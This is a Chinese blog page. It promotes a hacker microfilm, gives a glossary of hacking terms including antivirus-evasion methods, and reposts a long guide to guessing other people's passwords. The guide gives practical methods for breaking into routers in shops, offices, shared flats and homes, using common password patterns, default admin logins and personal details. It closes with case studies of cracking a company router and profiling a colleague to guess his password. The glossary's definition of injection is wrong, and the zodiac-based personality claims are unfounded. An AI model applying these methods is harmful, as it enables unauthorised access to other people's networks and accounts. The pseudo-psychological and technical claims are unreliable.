文章78
标签83
分类4

《我在(I m here)》真实黑客主演,中国首部黑客爱情微电影

幻想中的黑客,存在于好莱坞大片的视听体验和各种意淫当中,神秘,酷炫,无所不能。
而现实中,黑客给人的第一印象往往是沉迷技术、躲在暗处,不修边幅整日坐在电脑前的码农和攻城狮。
随着近年来信息安全概念热炒,安全圈终于热闹起来。
黑客这一群体才真正逐渐被人们所熟知起来,黑客群体并不都单调乏味穷屌苦逼,除了暗藏地下不可知者,明面上不乏丰富多彩。
他们和她们,现实中也有不逊于影视剧中的光彩斑斓。 当然,压轴的还是发布会的主角——中国首部黑客爱情微电影《我在(I’m here)(I’m here)》,影片全长11分钟,建议你找个安静有wifi的地方,好好欣赏。
视频地址:https://v.qq.com/x/page/r035943isou.html

黑客术语(我:迷之滑稽.gif)

问题:什么是木马?
答案:“木马”全称是“特洛伊木马(Trojan Horse)”,原指古希腊士兵藏在木马内进入敌方城市从而占领敌方城市的故事。在Internet上,“特洛伊木马”指一些程序设计人员在其可从网络上下载(Download)的应用程序或游戏中,包含了可以控制用户的计算机系统的程序,可能造成用户的系统被破坏甚至瘫痪。
问题:什么是后门?
答案:大家都知道,一台计算机上有65535个端口,那么如果把计算机看作是一间屋子,那么这65535个端口就可以它看做是计算机为了与外界连接所开的65535扇门。每个门的背后都是一个服务。有的门是主人特地打开迎接客人的(提供服务),有的门是主人为了出去访问客人而开设的(访问远程服务)——理论上,剩下的其他门都该是关闭着的,但偏偏由于各种原因,很多门都是开启的。于是就有好事者进入,主人的隐私被刺探,生活被打扰,甚至屋里的东西也被搞得一片狼迹。这扇悄然被开启的门——就是“后门”。
问题:什么是溢出?
答案:确切的讲,应该是“缓冲区溢出”。简单的解释就是程序对接受的输入数据没有执行有效的检测而导致错误,后果可能是造成程序崩溃或者是执行攻击者的命令。大致可以分为两类:(1)堆溢出;(2)栈溢出。
问题:什么叫注入?
答案:A a = new A();这相当于我们自己“注入”,就是把刚new出来的A对象“注入”到a这个引用中去(a为A类型或其父类型) 用spring以后由它替你做这一步,主要利用了java的动态加载机制。看上去没什么,但是结合多态的特性就会带来可观的功效:我们程序中的实际对象可以不必写死在代码中而是在运行时动态“注入”,这样我们就可以通过配置随时改变或增加我们程序的行为。
问题:什么是注入点?
答案:是可以实行注入的地方,通常是一个访问数据库的连接。根据注入点数据库的运行帐号的权限的不同,你所得到的权限也不同。
问题:什么叫旁注?
答案:顾名思义就是从旁注入,也就是利用主机上面的一个虚拟站点进行渗透,得到我们所要得到一个重要关节webshell之后,再利用主机的开放的程序以及一些非安全设置进行的跨站式入侵方法。
问题:什么叫肉鸡?
答案:所谓“肉鸡”是一种很形象的比喻,比喻那些可以随意被我们控制的电脑,对方可以是WINDOWS系统,也可以是UNIX/LINUX系统,可以是普通的个人电脑,也可以是大型的服务器,我们可以象操作自己的电脑那样来操作它们,而不被对方所发觉。
问题:什么叫跳板?
答案:一个具有辅助作用的机器,利用这个主机作为一个间接的工具,来入侵其他的主机,一般和肉鸡连用。
问题:什么叫shell ?
答案:shell就是系统于用户的交换式界面。简单来说,就是系统与用户的一个沟通环境,我们平时用到的DOS就是一个shell。(Win2K是cmd.exe)
问题:什么是root?
答案:Unix里最高权限的用户,也就是超级管理员。
问题:什么是admin?
黑客术语你知道多少答案:windows NT,2K,XP里最高权限的用户,也就是超级管理员。
问题:什么是rootshell?
答案:通过一个溢出程序,在主机溢出一个具有root权限的shell。
问题:什么叫webshell?
答案:webshell是web入侵的脚本攻击工具。简单的说来,webshell就是一个asp或php木马后门,黑客在入侵了一个网站后,常常在将这些asp或php木马后门文件放置在网站服务器的web目录中,与正常的网页文件混在一起。然后黑客就可以用web的方式,通过asp或php木马后门控制网站服务器,包括上传下载文件、查看数据库、执行任意程序命令等。
问题:什么叫网页木马?
答案:表面上伪装成普通的网页文件或是将而已的代码直接插入到正常的网页文件中,当有人访问时,网页木马就会利用对方系统或者浏览器的漏洞自动将配置好的木马的服务端下载到访问者的电脑上来自动执行。
问题:什么是挂马?
答案:就是在别人的网站文件里面放入网页木马或者是将代码潜入到对方正常的网页文件里,以使浏览者中马。
问题:什么是rootkit?
答案:rootkit是攻击者用来隐藏自己的行踪和保留root(根权限,可以理解成WINDOWS下的system或者管理员权限)访问权限的工具。通常,攻击者通过远程攻击的方式获得root访问权限,或者是先使用密码猜解(破解)的方式获得对系统的普通访问权限,进入系统后,再通过,对方系统内存在的安全漏洞获得系统的root权限。然后,攻击者就会在对方的系统中安装rootkit,以达到自己长久控制对方的目的,rootkit与我们前边提到的木马和后门很类似,但远比它们要隐蔽,黑客守卫者就是很典型的rootkit,还有国内的ntroorkit等都是不错的rootkit工具。
问题:什么是弱口令?
答案:指那些强度不够,容易被猜解的,类似123,abc这样的口令(密码)
问题:什么是默认共享?
答案:默认共享是WINDOWS2000/XP/2003系统开启共享服务时自动开启所有硬盘的共享,因为加了”$”符号,所以看不到共享的托手图表,也成为隐藏共享。
问题:什么是内网?
答案:通俗的讲就是局域网,比如网吧,校园网,公司内部网等都属于此类。查看IP地址如果是在以下三个范围之内的话,就说明我们是处于内网之中的:10.0.0.0—10.255.255.255,172.16.0.0—172.31.255.255,192.168.0.0—192.168.255.255
问题:什么是外网?
答案:直接连入INTERNET(互连网),可以与互连网上的任意一台电脑互相访问,IP地址不是保留IP(内网)IP地址。
问题:什么是端口(Port)?
答案:相当于一种数据的传输通道。用于接受某些数据,然后传输给相应的服务,而电脑将这些数据处理后,再将相应的恢复通过开启的端口传给对方。一般每一个端口的开放的偶对应了相应的服务,要关闭这些端口只需要将对应的服务关闭就可以了。
问题:什么是3389、4899肉鸡?
答案:3389是Windows终端服务(Terminal Services)所默认使用的端口号,该服务是微软为了方便网络管理员远程管理及维护服务器而推出的,网络管理员可以使用远程桌面连接到网络上任意一台开启了终端服务的计算机上,成功登陆后就会象操作自己的电脑一样来操作主机了。这和远程控制软件甚至是木马程序实现的功能很相似,终端服务的连接非常稳定,而且任何杀毒软件都不会查杀,所以也深受黑客喜爱。黑客在入侵了一台主机后,通常都会想办法先添加一个属于自己的后门帐号,然后再开启对方的终端服务,这样,自己就随时可以使用终端服务来控制对方了,这样的主机,通常就会被叫做3389肉鸡。Radmin是一款非常优秀的远程控制软件,4899就是Radmin默认使以也经常被黑客当作木马来使用(正是这个原因,目前的杀毒软件也对Radmin查杀了)。有的人在使用的服务端口号。因为Radmin的控制功能非常强大,传输速度也比大多数木马快,而且又不被杀毒软件所查杀,所用Radmin管理远程电脑时使用的是空口令或者是弱口令,黑客就可以使用一些软件扫描网络上存在Radmin空口令或者弱口令的主机,然后就可以登陆上去远程控制对恶劣,这样被控制的主机通常就被成做4899肉鸡。
问题:什么是免杀?
答案:就是通过加壳、加密、修改特征码、加花指令等等技术来修改程序,使其逃过杀毒软件的查杀。
问题:什么是加壳?
答案:就是利用特殊的酸法,将EXE可执行程序或者DLL动态连接库文件的编码进行改变(比如实现压缩、加密),以达到缩小文件体积或者加密程序编码,甚至是躲过杀毒软件查杀的目的。目前较常用的壳有UPX,ASPack、PePack、PECompact、UPack、免疫007、木马彩衣等等。
问题:什么是花指令?
答案:就是几句汇编指令,让汇编语句进行一些跳转,使得杀毒软件不能正常的判断病毒文件的构造。说通俗点就是:杀毒软件是从头到脚按顺序来查找病毒。如果我们把病毒的头和脚颠倒位置,杀毒软件就找不到病毒了。


这么吊的文章转载于:http://www.xxvvv.cn/177.html

密码破解与心理学

第一部分:十大基本规律

规律一:绝大多数人都高估了破译密码的难度和低估了自己密码存在的风险,因而,往往把能够破解密码的人当成神秘人物,同时基本很少有修改自己密码的习惯。
规律二:绝大多数人一生常用的密码通常不会超过3个,如果你破解了某人的QQ密码,很可能你也破解了他的论坛密码、邮箱密码、游戏账号密码……
规律三:从 性别上看,男性的密码比女性的要更加难破;从年龄层面上看,年轻人的密码比35岁以上的人群的密码更加难破;从受教育层度上看,大专以上学历的人群相对于 以下学历人群,密码破解难度更大,且大专、本科、硕士学历的人群密码破解难度基本上没有什么区别;从专业角度上看,理科生的密码比起文科生要难破一些,计 算机相关专业的学生密码破解难度最大。
规律四:绝大多数人的密码,基本上都是有确定含义的,随机乱码组成的密码极度罕见(应该说我从来没有遇到过,不过如果是这种密码,我这种基于心理的思路,可以确定毫无办法)。
规律五:大多数人的密码要么纯粹用数字组成,要么纯粹用小写字母组成,要么用数字加字母组成,只有很少人会采用下划线,极少数的人字母区分大小写。
规律六:密码所采用的字母中,很多都是姓名拼音、名字拼音的全部或首字母缩写,某一图腾的英文单词(通常是名词)——图腾的含义后面会提到,某一单位名的首字母缩写,以及某一地名的拼音或英文及其缩写。
规律七:密码所采用的数字中,很多有关日期,且该日期对密码所有人拥有极其重要的意义,还有很多与地名和电话号码有关。
规律八:使用下划线的密码,下划线通常只出现一次,一般这类密码的主人密码保护意识很强,其密码往往还包含数字和字母,这种密码的下划线的位置通常处在数字和字母的分隔处;字母区分大小写的密码,大写通常只出现一次,并且很多时候都出现在密码的开头,极少数出现在结尾。
规律九:除非所登录系统有严格的位数限制,否则密码的位数通常是8位到11位,7位以下的密码和12位以上的密码较为少见。
规律十:公 共网络的密码通常很少包含个人信息,大多数是单位名称的全部或某一部分的中文或英文全称,或者英文或拼音的首字母缩写,外加拥有特定含义的数字,这种数字 通常是电话号码或者门牌号,另外,有些密码是上述特定字母或其缩写的简单重复,如:12341234、abcabcabc;个人密码则很少出现上述简单重 复的情况。

第二部分:十大规律隐含的心理学特性

一、惰性

从上述很多条规律都可以看出人或多或少存在惰性,比如很少人会定期修改密码;再如很少人密码会区分大小写,因为这样的话必须进行至少一次大小写切换;再如各种不同账号使用同一密码都是人存在惰性的有力证明。

二、自我意识

自我意识很多时候体现在使用名字的密码上,通常,自我意识较为强烈的人,很看重自己的名号或者名誉,因而,其密码一旦使用自己的名字,往往就是名字的全拼, 较少使用缩写,更不会省略自己的姓氏,另外,这类人也有很大一部分使用的是某一图腾的英文单词,例如某人非常崇拜某一偶像,那么,这个偶像就是他的图腾, 其密码很有可能与这个图腾有关。

三、自我保护意识

从公用密码很少包含个人信息这一点很容易印证自我保护的问题,一般来说,当某一网管或其他特定工作性质的人需要为某公用账号设置密码时,首先需要考虑的是密 码易为别人所理解和记忆,然而,一个人在考虑秘密之类的东西时,首先联想的是他自己身上的东西,由于这些东西涉及其个人隐私,因而很容易被他的潜意识所排 除。

四、爱与责任感

不少人的密码会使用伴侣和孩子的姓名或生日、结婚纪念日、自己公司成立日期等诸如此类的信息,这很明显地体现了爱和责任感。

五、完美主义倾向

完美主义倾向在密码中主要体现在对称与平衡上面,这从名字加日期的组合式密码和带下划线的密码可以很容易看出来,例如,某人叫做张三,生日是1980年1 月1日,那么,如果采用前者,其密码往往是zhangsan19800101或者zhangsan8011,不大可能设置成 z1h9a8n0g0s0a1n01这种类型;如果使用下划线密码,则很大可能会采用zhangsan_19800101或者 zhang_san_19800101,不大可能采用_zhangsan19800101或者z_hangsan19800101这种类型。

第三部分:常见的无脑型密码

所谓无脑型密码,指那种破解起来没有任何技术含量,纯粹依靠运气就可以破解的密码,这种密码通常为公用,其结构很多时候为:某一数字的简单重复,某一简单规 则的数字序列,某一简单规则的字母序列,按某种简单规则组合的数字和字母序列,以上四种密码有以下一些典型例 子:01223456789,1234567890,123123123,12341234,0987654321,13579824680。

或者这样:qwertyuiop,abcabcabc,abcdabcd,abcdefg, 八个8,八个6,八个1,八个0,八个或者九个9,abcd1234,abc123abc123,abcd4321,所在城市区号的简单重复,等等。
这种无脑型密码常见于公用的网络或者邮箱账号,尝试破解公共密码的时候,通常优先选用以上提到的这些密码进行尝试,在北京的时候,我用 qwertyuiop破解了一次路由器的密码,来到潮州之后,第一次用1234567890破解了一次密码,后来才知道是同事手机网络的密码,现在用的网络是邻居的,密码是8个8.

第四部分:公共网络的路由器密码破解法

其实从严格意义上来讲,只要接了路由器,那么,其网络必定是共享的,因而只要接了路由器的网络,都可以看成是公用网络,区别在于公用的程度,一般来说,从公用的程度来讲,路由器可以分为四类:公共场所、公司、公租房、家庭,其中公用程度越高,密码破解难度就越低。

一、公共场所的路由器密码破解法

公共场所通常包括旅馆、饮食场所、网吧、商场等人流量大,人群确定但身份群不稳定的场所,这种场所的网络基本上不会包含任何个人信息,且大多数密码都是无脑型密码,此外最常见的密码是以下几种:

场所名称的拼音或英文的简单重复
场所门牌号的简单重复或前半部分为门牌号,后一部分为门牌号的倒序
场所名拼音或英文加上场所所在门牌号或分店号
场所预约电话、送餐电话或400免费服务电话
场所名拼音或英文加上4位到6为无脑型密码
场所门口某路公交车号码的简单重复
总的来说,很多的场所是不设置密码的,设置密码的作用也不大,其设置密码的目的通常是防止临近商家或住户的盗用,但只要这些用户稍微花点心思,则获取密码易如反掌。

二、公司路由器密码破解法

如果你在搜索网络的时候,搜索到网络名为4位以上的大写英文字母的,这种网络很有可能是公司网络,其密码的组合通常非常简单,除了以上提到的无脑型密码以外,很有可能采用如下几种形式。

公司名拼音或英文的简单重复,如中国移动,其某一门店的哦网络有可能是zgydzgyd,或者chinamobile
公司门牌号的简单重复或者前半部分为门牌号,后一部分为门牌号的倒序,例如某公司位于某栋大楼的1606室,那么其密码有可能是16061606或者16066061
公司前台电话号码,有时还会加上公司所在城市的区号
公司名拼音或英文加上公司门牌号
公司名拼音或英文加上某一4位到6位的无脑型密码
公司名拼音或英文缩写加上电话号码或电话号码的最后4位
总之,公司的网络由于用的人多,所以,其密码包含的较难记住的信息越少,破解难度是非常低的,只要有耐心多尝试几次,一般来说,都不难破解,至于公司的名称、门牌号码和电话号码如何获得,这个我想只要你在一些写字楼上过班,都不用我来教你。
三、公租房路由器密码破解法
这里所谓的公租房,是指来自不同地方彼此不认识的人或者彼此要好的同学、朋友、同事一起租住的房子,包括大学宿舍,职工宿舍,同时还包括彼此独立租房,但共用一个网络的用户群。
公租房的密码类型已经或多或少接近于家庭密码,但由于成员关系不如家庭那么亲密,因而,其包含的个人信息依然较少,破解的成功率依然较为可观。除了上述提到的无脑型密码以外,公租房的密码通常还有以下几种类型:

所在小区名或楼层名拼音的全部或者拼音简写的简单重复,例如“金碧花园”用户,其密码就有可能是jinbihuayuan或者jbhyjbh
房号或者楼号加房号或其简单重复,或者前一部分为房号,后一部分为房号的倒序,例如我在北京时候住在某栋小区的2号楼2单元1202房,我为租用我网络的 用户设置的密码就是12022021;同时,尝试过登录邻居路由器的时候,住在1201的公租房用户,其密码为12011201;住在11楼3号房的用 户,其路由器密码为02021103。
小区名的简写加上房号,例如,我在北京住的小区名为华龙美晟,搜到我楼下2号房的用户,其路由器密码为hlms1102。
宿舍电话号码或者前面加上区号,例如,广州某大学宿舍的电话号码为61306325,那么,其密码有可能就是61306325或者02061306325.
公租房用户都要经常用到的某一电话号码,例如送水电话,送煤气的电话,送餐电话,等等。
四、家庭路由器密码破解法
家庭密码在这四类密码中间,相对来说是最容易破解的,因为大家彼此都很亲密,因而,这类密码通常包含了不少家庭方面的信息,不过,从人性的角度来将,再亲 密的人彼此之间也是存在隐私的,因而,这类密码通常不会包含真正内心深处的隐私,因而,相对于个人密码来讲,其破解难度要低得多。
不少的家庭路由器密码依然使用上述的无脑型密码,另外一些则具备公租房密码的特点,以上这些都不再赘述,下面谈谈家庭路由器密码相对于公租房密码所不具备的特点及其破解方法。

家庭姓氏拼音的简单重复,这种常见于姓氏拼音4个字母以上的家庭,如张、周等,而像李、林一类的姓氏,这种方式就要少见得多。另外,有趣的是,以姓氏进行 简单重复的密码,其首字母通常会采用大写,有的甚至是遇到第一个字母就大写一次的现象,例如某一姓张的家庭,其密码有可能会采用Zhangzhang或者 ZhangZhang的格式。
家庭所居住的房屋的电话号码或者区号加上电话号码,这类密码有时候家庭会出于安全考虑,在电话号码最后会加上一位到两位防盗码。例如,某家庭的电话号码是81008100,那么其路由器密码有可能会是810081000,最后一个0就是防盗码。
老家的电话号码,这是我阅读上面提到的那份资料所发现的一个密码规则,当时我发现有几个人采用这种类型的密码,其中一个人注册资料填写的寄件地址是北京, 而户籍地址是河北某县的,而其密码以0开头,看起来像一个电话号码,因而上网查找,果然发现这个密码的前面几个数字与其户籍地址所在的县城区号相对应,因 而断定这是一个老家的电话号码,尽管这属于个人密码,但是由于老家的电话是家庭成员所共知的,因而完全有可能被用作路由器密码。
家庭姓氏的拼音加上电话号码或者手机号码。
以下几条是我认为可能存在的规则,但是由于之前破解的过程没有相关的信息,因而没有经过验证的,一并提出来供大家参考。

夫妻两个人的姓氏加上结婚纪念日,有可能是两个姓氏连在一起,后面加上结婚纪念日;也有可能是两个姓氏分别放在两端,结婚纪念日放在中间。
第一个孩子的姓名、小命加上孩子生日。
父亲或者母亲的生日。
夫妻之间妻子的姓名,丈夫私底下对其的爱称加上妻子的生日。这一条是有性别的分工所决定的,因为通常涉及电脑的东西,男性懂得会更多,因此借此机会向配偶表达一下爱意是完全可能的。
家里养的宠物的名字加上某一特定含义的数字。
总之,只要你掌握足够的信息,通过这上面已经经过验证和没有经过验证的几条规律,就有极大的可能破解人家的路由器密码。
以上就是几种人群分布所在网络的路由器密码破解的主要内容,而有的时候,破解密码甚至都不需要用到以上的方法,因为路由器通常也就是那么几个品牌,而很多 品牌的路由器地址都是固定的,例如TP-link及其他很多品牌的很多型号使用的地址是192.168.1.1,像腾达则很多使用 192.168.0.1,而各大品牌的路由器的默认初始登录账号和密码都是admin,偏偏很多人又不会操作,有的即使懂得操作也不愿意去修改路由器的登 录密码,因而有时候你可能很轻松的就进入人家的路由器去进行诸如设定固定IP、修改流量、重启路由器等操作。如果你搜索某个网络的网络名是诸如 Tenda,TP-link_2D18FA这样的含有品牌名的网络,那么,很有可能他的路由器登录密码也是没有修改的,只要你懂得路由器怎么操作,那么, 这种网络是很容易就突破了。

第五部分:基于性格分析的个人密码破解法

一、个人密码常用的组成要素

自己姓名、伴侣姓名、孩子姓名的拼音或其缩写。
自己生日、伴侣生日、孩子生日、父亲或母亲生日、自己公司开张纪念日、结婚纪念日、某个亲人的忌日等对密码主人有特别重要意义的日期。
家庭电话号码、老家电话号码、个人手机号码、爱人手机号码。
身份证、房产证、驾驶证、自己公司的经营许可证、营业执照等证件的号码或其号码段。
与自己所追求或崇拜的事物有关的事物(即:图腾)的名称或日期。
自己、亲人、宠物、图腾的昵称。
爱人或者某一图腾的名称(通常是简称),加上1314(一生一世)或者5201314(我爱你一生一世)这样拥有谐音特性的数字串。

二、图腾

“图腾”体现在现代人的精神世界里,很多的时候是爱、理想、人格参照物等美好事物的象征。其一般意义通常与宗教或者原始崇拜有关,而宗教之所以能够一直存 在,很大程度在于其能直达人类的内心深处,密码“密”的特点与图腾的这种特点很容易就能够互相结合,因而,与图腾相关联的一些事物,很容易被人们选作密码 的载体。
在密码中,常见的图腾通常有以下几种:

  • 初恋对象的名字拼音或其缩写,或者昵称的英文,初恋对象的生日或与初恋各种第一次的日期,与初恋对象有关的事物,例如某只宠物的名字、第一次约会的地点。
  • 某个特别崇拜的人物的姓名、外号或者生日、忌日。
  • 某个特别向往的地方的名字,包括发誓一辈子无论如何要去一次的地方或者故乡。
  • 某个特别向往的神话人物或一种与一种理想生活有关的事物,例如:乌托邦(Utopia)。
  • 某个童年时期对自己影响极深的人物的名字或者事物的名称,例如:电影《公民凯恩》中,凯恩至死都念念不忘的“rosebud”,如果凯恩生在现代,那么,我刚说他的密码百分之百会包含这个单词。

    三、不同人格类型的人群使用密码的习惯

    由于各自使用的标准不同,古今中外各种心理学家和人物学家,对于人群的分类方法可谓千差万别,例如:儒家通常会将人分为圣人、君子、小人,三国时期的刘劭则 将人按才的不同分为英、雄、俊、杰,中国的命理学更是将人按照生辰八字的结合分出“财官双美格”、“食神生财格”等多种类型,而“阴阳二十五人”分类法则 将人按照五行体现的气质将人分为二十五类;西方心理学有按星座进行区分的,还有按照九型人格进行区分的,而像弗洛伊德则将人的思想分为有意识和无意识两 种,施普兰格尔则把人格分为理论、经济、艺术、社会、政治 、宗教6种类型………
    由于理论基础不一样,因而其分类方法就不一样,对于密码来说,上述无论任何一种理论所提供的分类方法都难以能够和该人群的密码使用习惯一一对应,因而,下面我将结合自己的经验以及自己的思考,对不同类型的密码所对应的人群进行分类。
    由于自己过往破译的密码并不算太多,而阅读过的那份材料所涉及的人又全部素未谋面,加上我并没有学过系统的心理学课程,因而,以下的分类方法未必科学,难 免会遗漏某些人格类型,同时,也缺乏统计学意义上的证据作为支撑,因而你不妨把他看成是一种无稽之谈。需要特别指出的是,以下分类所涉及的人群,并没有严 格的界限,有很多人同时兼具不同的性格特点,因而其密码也会同时拥有各自的特点。
    1、责任感型
    责任感通常来源于自信以及对家人强烈的爱,这种人通常在社会上比较成功,对社会现象有特定的判断标准,且其看法不容易为别人所动,体现在生活习惯上,他们选 择工作时通常比较谨慎而且目标明确,日常生活较为单一,除了工作以外,他们会花很多的时间陪家人,赚来钱通常花在家人身上或者交给爱人保管。这种人群的密 码通常包括以下的要素:爱人的姓名、昵称或生日,结婚纪念日,孩子的姓名、昵称或生日,老家的电话号码,父亲或母亲的生日。
    2、洁癖型
    此处指精神意义上的洁癖,这种人的思想中存在一个特定的界限,这个界限是无论自己还是别人都不允许逾越的禁区。这种人要么特别成功,要么整天抱怨;要么像个 外交家,要么极度孤僻;同时他们别人的某些行为或者社会想象拥有常人所难以理解的评判标准,这种人的自我意识通常很强,而且对某种理想的人事或者生活拥有 强烈的向往,在他们的内心深处,通常埋藏着一段失败但又刻骨铭心的情感经历。这一类型的人,其密码最大的可能是使用图腾。
    3、两肋插刀型
    这一类人通常具备很强的领袖气质,而且极度自信,他们通常有很多的朋友,而且非常好动,属于坐久了屁股就会长疮的人,他们隔三岔五就会带一大群朋友回家吃饭 或者睡觉,也经常夜不归宿,朋友需要帮忙的时候,他们通常会二话不说地伸出援手,也经常路见不平,他们通常自我意识强烈,很少对人设防。其密码的类型通常 不是无脑型就是自己的姓名加上出生年月,且姓名必定是姓氏加名字的全部字母,极少使用简写,顶多加上一两位的防盗码,有时也会使用亲人的信息。
    4、幻想型
    幻想型通常存在于花季少女,这种人的QQ空间、博客和微博通常带有炫目的色彩,通常使用一些童话、神话或幻想世界中才有可能存在的事物,他们追求时尚,爱看 偶像剧,常会做出孩子气的行为,对小动物通常非常呵护,有不少人有养宠物的习惯,她们通常家庭条件较好,从小受惯长辈的宠爱,她们内心深处通常非常自私, 尽管外表并非如此。这种人的密码类型通常使用图腾,且该图腾一般是某个白马王子的姓名或者生日,或者宠物的名字,或者某种她幻想中的理想事物。
    5、好斗型
    所谓好斗型,并非指表面上爱与人争吵或者打架,而是指表面上不懂声色,但却在暗处与你暗暗较劲的人,例如某次你考了第一名,而他考了第三名,在别人都恭维 你,要你请客吃饭的时候,他会找借口不去,或显得心事重重,私底下会更加卖力学习,期望下一次考试超越你。这种人通常自我意识强烈,拥有让人难以忍受的自 负,妒忌心也很强。这类人的密码通常与他自己有关,其使用的密码,通常要么包含自己的昵称、姓名、手机号码或生日,也有很大几率使用图腾,且这个图腾极有 可能是他在孩提时代或青春期对他成长产生强烈影响的事物。
    6、事业领袖型
    这种人通常也具备很强的责任感,但与责任感型的人相比,他们的责任感的重心更多的放在工作上,他们严格要求自己,更加严格地要求自己的下属和亲人,有时会 让人觉得无法忍受,工作起来,这种人是废寝忘食的,当他投入工作的时候,决不允许别人打扰他,说话的时候,一旦被人打断或者听到不想听的话,就会直接质问 对方,这种人的密码,很多时候会使用自己的名字或者昵称,且很多时候会使用缩写或者不包括姓氏的名字拼音,或者与他公司或者事业有关的名称或号码,有时也 会使用图腾,且该图腾要么是他认为别人绝对意想不到的事物。
    7、完美主义者
    其实每个人或多或少都有完美主义的倾向,对于完美主义倾向比较显著的人来说,他们未必注重自己着装的品位,但是他们会追求有品质的事物;他们崇拜的对象通 常都是人格、智力都看上去完美无缺的人;他们的房间通常物品摆放整齐,有时出门走到半路,想起家里某个物品没有摆放好,甚至会跑回来把他放到让自己看起来 安心的位置;他们通常喜欢自己整理自己的房间,不喜欢让别人插手,因为,在他们看来,由别人经手的东西都是不完美的;这种人通常严于律己,洁身自好,而且 在道德上有种让一些小人难以忍受的优越感;这类人也许也会讲脏话,但在他们内心深处,对纯洁的爱情却极度向往,大多数这方面的男性拥有处女情结,女性则通 常向往王子公主式样的爱情。这类人的密码,一旦使用名字,则名字很大几率是全名,或者是某一特定的单词(如love,great等具有美好意义的形容词) 加上全名的简称,一旦使用日期则日期通常是20120101这样的格式,很少会选择1211或120101这种格式,一旦使用电话号码,则电话号码通常包 含区号,他们手机的电话簿,每个人的人名通常是全名,极少会忽略姓,也很少使用昵称;一旦使用下划线,则下划线的位置通常是能够高度体现对称美的。
    8、现实主义者
    现实主义者体现在思想上,不相信奇迹,他们行为上不容易走极端,但思想上却非常极端,例如,他们相信某个名人的成功是难以复制的,尤其是他身边的人;他们认 为官员中没有好官,娱乐圈的女性每个都被潜规则过,有时候和他们交谈,你会忍受不了他们满口的大道理。这类人的密码,一旦使用姓名,通常是简写,日期则以 简约型的居多,如果使用下划线,他们对于对称没有什么要求,有时下划线会出现在第一位,字母区分大小写的在这一类型的人中最为常见。
    以上八种人格类型,到目前为止,是我所能遇到并总结出来的全部有关密码在性格特征上的分类,在我过往所破解和遇到的密码中,还没有任何一个密码所对应的人 群逃得过以上所谈到的情况。另外,从星座的观点来看,还有一些比较有趣的现象,例如,责任感型密码通常分布在天蝎座、射手座、狮子座、处女座上面,洁癖型 的密码通常分布在水瓶座、双子座、天蝎座、白羊座和处女座,两肋插刀型则很多分布在白羊座、双鱼座、狮子座和摩羯座上面,幻想型绝大部分分布在双子座、天 平座、射手座、水瓶座上面,好斗型则很多分布在白羊座、巨蟹座、天蝎座、处女座和摩羯座上面,事业领袖型则很多分布在金牛座、狮子座、天平座和摩羯座,完 美主义者型则大多出现在白羊座、天平座和水瓶座,现实主义者则很多分布在金牛座、巨蟹座、射手座和摩羯座。另外,双子座、双鱼座和天平座最容易使用无脑型 密码。双子座和水瓶座使用密码的规律最难以捉摸。
    上述总结的内容正确与否还有待进一步验证,你也可以从上面找到一种你认为最符合你性格特征的类型,结合你自己的密码进行验证,看看我说的准不准。

第六部分:密码破解案例示范

一、破解某公司会议室路由器密码

公司信息:IT行业;公司名称两个汉字,全部拼音为10个字母;英文简写为4个字母,假设为abcd;会议室在16楼,号码已经忘记,以1601作为示例。
路由器类型:TP-link品牌某型号路由器,登录地址为192.168.1.1,不具备无限功能,有线登录时也需要账号密码
网管人员:认识的人,性格有点墙头草,容易左右摇摆;一旦跟他说话时语气强硬,对方则深怕会得罪你的样子;开会时经常心不在焉,说话有时不着边际;做事拖沓,有头无尾
破解过程:
首先,分析网管人员的性格特点,由于是IT从业人员,因而通常具备较强的密码保护意识,因而不大可能使用无脑型密码,此外,从此人做事的习惯来看,可看出其对专业服务意识及自我认同度较差,不大可能使用严格的加密法。
其次,上述性格类型的人通常有一种不安全感,因而,其设置的密码不大可能使用他自己的个人信息;此外,做事不认真的人通常有一定惰性,其设置的密码不会太长,八位至十位是最有可能的位数。
其三,由上述两条可以判断,密码使用最大的可能要么是公司名全部拼音的10个字母,要么是英文缩写的简单重复或者英文缩写加上1601,也有可能是房间好 的简单重复;进一步分析,此网管头脑简单,通常他宁愿使用16011601这样的序列,也不会有那心情去对后面的那个1601进行倒序。
最后,账号名通常会使用约定俗称的字母组成,且很可能是4位到6位,所以,账号很大可能是公司简称abcd。
最终结果:
账号:abcd
密码:16011601
从密码逆推网管人员的性格:
平时对其印象完全正确,此人可做朋友,因为他没有什么心机,不会害你,但不可共事,因为缺乏责任感。日后项目重要节点的相关事项尽量不能托付给他,即使不得 已托付此人,也必须保持高度警惕,不时跟进。然而,非常遗憾的是,最后关头我依然险些栽在此人手里,那是为了校对数据,由于当时系统有多个平台,而校对数 据必须在真实平台上进行,在校对前,我特意向他用邮件和电话确定真实平台地址,后来安排了自己公司和合作单位的20几个人校对了整整一天,最后还是发现此 人给我的地址是个测试平台地址,气得老子当着公司和他们公司领导的面狠狠地耍了一回酷,不过气归气,工作却得从头再来,于是只好一边找了10几个人,说了 半天的好话,熬到半夜两点多才把所有数据校对完毕,91ri.org 庆幸总算没有拖慢项目进度!

二、破解某同事个人密码

对象个人信息:IT公司中层经理,多个项目参与者及主要负责人;做事认真,有条不紊,名牌大学毕业;为人圆滑、精明——应该说我很少遇到这么聪明的人;对自 己的业务能力极度精通,在公司人称“鬼才”;性格平和,对下属非常宽容,经常面带微笑,拥有很强的人格魅力;思维严谨,经常看有关人性和数学方面的书籍
破解过程:
首先,由于此人从属于IT行业,加上拥有很高的智商,因而通常拥有很强的密码保护意识,绝不可能使用无脑型密码——应该说,觉得他会使用无脑型密码就是对他智商的侮辱。
其次,他也不大可能会在密码中透露自己的个人信息和爱人的身份信息,使用广州家里的电话号码,办公室号码和手机的可能性也不大,除非是老家的电话号码。
再次,由于其强烈的密码保护意识,他的密码通常会比普通人的要长,有可能会达到13位以上。
再次,最大可能是此人会使用“图腾”,由于其思维的严密性,喜欢数学,空间思维能力较强,会比较注重对称美,加上强烈的密码保护意识,很有可能会使用下划线,并且下划线的位置会高度体现对称美。
再次,其使用的图腾极有可能是很多人平时容易忽略的常识性意象物,并且很有可能与其爱好有关,这时候一个意念物在我脑中一闪而过——圆周率π!印象中第一 次接触这个常数倒不是在数学课,而是在历史课上,现在依然记得老师跟我们吹嘘的中国历史,还记得祖冲之以及“3.1415926至3.1415927之 间”这句话。的确,对于一个酷爱数学的人来说,如果在数学世界里采用某个常数作为密码的意象物,还有什么比这个东西更合适的?——既是圆身上的东西,本身 就是完美的象征,同时其通常被记住的位数是8位,在长度上也非常符合密码使用的习惯。
